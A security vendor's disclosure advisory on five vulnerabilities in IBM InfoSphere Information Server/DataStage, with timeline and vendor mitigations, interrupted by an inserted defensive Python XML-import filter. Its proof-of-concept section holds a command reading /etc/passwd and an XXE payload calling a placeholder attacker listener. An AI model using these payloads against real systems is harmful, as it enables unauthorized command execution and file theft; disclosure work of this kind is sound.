Multiple Vulnerabilities In IBM Infosphere Information Server / Datastage

Title

Multiple Vulnerabilities

Product

IBM Infosphere Information Server / Datastage

Vulnerable Version

9.1, 11.3, and 11.5 (including Cloud version 11.5)

Fixed Version

-

CVE Number

CVE-2017-1495, CVE-2017-1468, CVE-2017-1383, CVE-2017-1467

Impact

critical

Found

16.03.2017

By

Goh Zhi Hao, Mohammad Shah Bin Mohammad Esa, Samandeep Singh (Office Singapore) | SEC Consult Vulnerability Lab

The IBM Infosphere Datastage application is affected by weak authorization flaws which allow a low privileged user to execute system commands. Furthermore, it is affected by multiple other vulnerabilities.

Vendor Description

“IBM® InfoSphere® DataStage® integrates data across multiple systems using a high performance parallel framework, and it supports extended metadata management and enterprise connectivity. The scalable platform
provides more flexible integration of all types of data, including big data at rest (Hadoop-based) or in motion (stream-based), on distributed and mainframe platforms.”

Source: http://www-03.ibm.com/software/products/en/ibminfodata

Business Recommendation

Attackers are able to bypass authorization controls and execute system commands. The vendor did not provide a patch but published mitigation steps which have to be implemented.

SEC Consult recommends that the vendor conduct a comprehensive security analysis, based on security source code reviews, in order to identify all vulnerabilities in the affected platform and increase the security for its customers.

Vulnerability Overview/ Description

1) Weak Authorization (CVE-2017-1467)

The Administrator Client allows users with high privileges to execute commands. A low privileged application user can replay the same request and execute arbitrary commands on the server.

This happens because the application maps all users to a single Linux user on the backend server. The application's privileges are those of this system user, irrespective of the role of the application user.

Hence, a low privileged application user can execute any command on the backend OS, limited only by the privileges of the Linux user the application is using.

2) XML eXternal Entity (XXE) Injection (CVE-2017-1383)

The Designer client allows users to import files in XML format. By tricking a user into importing an XML file containing malicious XML code, it is possible to exploit an XXE vulnerability within the application.

3) DLL Preloading

Dynamic Link Library (DLL) files are loaded from the application's home directory without being verified. This may lead to execution of arbitrary files on the system, as any user can replace the DLLs.

4) Loading Arbitrary Executables (CVE-2017-1468)

The Director and Designer clients do not check for any file signatures before loading and executing other executable files. Existing files can be replaced by any user with executable files, which will then be executed from the toolbar.

5) Cleartext Passwords in Memory Dump (CVE-2017-1495)

User credentials are stored in clear text in process memory, which can be dumped to retrieve these credentials.

Proof Of Concept

1) Weak Authorization (CVE-2017-1467)

Any command can be injected back to the Administrator Client to execute system commands.
Example:

SH -c "cat /etc/passwd"

2) XML External Entity Injection (XXE) (CVE-2017-1383)

For example, by importing the following XML code, arbitrary files can be read from the client's system. The following code generates a connection request from the client system to the attacker's system:

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
  <!ELEMENT foo ANY >
  <!ENTITY xxe SYSTEM "http://[IP:port]/" >
]>
<foo>&xxe;</foo>

IP:port = IP address and port where the attacker is listening for connections

Furthermore, some files can be exfiltrated to remote servers via the techniques described in:

https://media.blackhat.com/eu-13/briefings/Osipov/bh-eu-13-XML-data-osipov-wp.pdf
http://vsecurity.com/download/papers/XMLDTDEntityAttacks.pdf
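As an added example (not part of the advisory or the product), a defender-side import gate in Python: the PoC above only works if the parser accepts a DOCTYPE with an ENTITY pointing at an external resource, so the gate refuses those constructs before any resolution can happen. The element names in the benign sample are constructed for the example and do not reflect the real DataStage import schema.

```python
import xml.parsers.expat


class UnsafeXMLError(ValueError):
    """Raised when an import file carries the DTD constructs an XXE payload relies on."""


def parse_import_safely(data: bytes) -> dict:
    """Parse an XML import while refusing any DOCTYPE, entity declaration or
    external entity reference. Returns the element names and text seen."""
    parser = xml.parsers.expat.ParserCreate()
    elements, text = [], []

    def reject(what):
        def handler(*_args):
            # Raising inside an expat handler aborts Parse() with this exception.
            raise UnsafeXMLError(f"{what} is not accepted in import files")
        return handler

    parser.StartDoctypeDeclHandler = reject("DOCTYPE declaration")
    parser.EntityDeclHandler = reject("entity declaration")
    parser.ExternalEntityRefHandler = reject("external entity reference")
    parser.StartElementHandler = lambda name, attrs: elements.append(name)
    parser.CharacterDataHandler = text.append
    parser.Parse(data, True)
    return {"elements": elements, "text": "".join(text)}


def classify_import(data: bytes) -> str:
    """Gate to run before handing an import file to the real importer."""
    try:
        parse_import_safely(data)
        return "accepted"
    except UnsafeXMLError:
        return "rejected"
    except xml.parsers.expat.ExpatError:
        return "malformed"


# Constructed samples: the advisory's PoC (placeholder listener address kept as
# written) and a benign import document with made-up element names.
XXE_SAMPLE = (b'<?xml version="1.0" encoding="ISO-8859-1"?>'
              b'<!DOCTYPE foo [ <!ELEMENT foo ANY >'
              b'<!ENTITY xxe SYSTEM "http://[IP:port]/" >]>'
              b'<foo>&xxe;</foo>')
BENIGN_SAMPLE = b'<?xml version="1.0"?><Export><Job name="demo"/></Export>'

if __name__ == "__main__":
    print("PoC import:", classify_import(XXE_SAMPLE))        # rejected
    print("benign import:", classify_import(BENIGN_SAMPLE))  # accepted
```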

3) DLL Preloading

Removed proof of concept.

4) Loading Arbitrary Executables (CVE-2017-1468)

The following executables can be replaced with other executable files of the same name:

  • Director.exe
  • DSDesign.exe

5) Cleartext Passwords in Memory Dump (CVE-2017-1495)

Users can create a memory dump of the application based on its process ID. User credentials can be extracted by searching for them in the dump file.

Vulnerable / Tested Versions

The following version has been tested, which was the most recent one when the vulnerabilities were discovered:

  • IBM Infosphere Datastage 11.5

IBM states that the following products are also affected:

  • IBM InfoSphere Information Server: versions 9.1, 11.3 and 11.5
  • IBM InfoSphere Information Server on Cloud: version 11.5

Vendor Contact Timeline

2017-05-23: Contacting vendor through email (https://www-03.ibm.com/security/secure-engineering/report.html)
2017-06 – 2017-07: Coordinating with vendor to wait for their public disclosure of fixes/mitigations. Vendor also requested more time to get back to us on some of the issues.
2017-07-29: Informed vendor that issue 3 will be released without proof of concept as fix/mitigation is not available.
2017-07-31: Vendor releases mitigation steps / workarounds
2017-09-13: Public release of advisory

Solution

No patches are available. The vendor described mitigations/workarounds for the vulnerabilities.

Workaround

See the following URLs by the vendor for further details regarding mitigation steps:

1) Weak Authorization (CVE-2017-1467)
http://www-01.ibm.com/support/docview.wss?uid=swg22006063

2) XML eXternal Entity (XXE) Injection (CVE-2017-1383)
http://www-01.ibm.com/support/docview.wss?uid=swg22005803

Update: 3) DLL preloading
The vendor stated that the issue will be resolved by 30th November 2017.

4) Loading Arbitrary Executables (CVE-2017-1468)
http://www-01.ibm.com/support/docview.wss?uid=swg22006067

5) Cleartext Passwords in Memory Dump (CVE-2017-1495)
http://www-01.ibm.com/support/docview.wss?uid=swg22006068

ADVISORY URL

https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html


EOF M. Shah / @2017
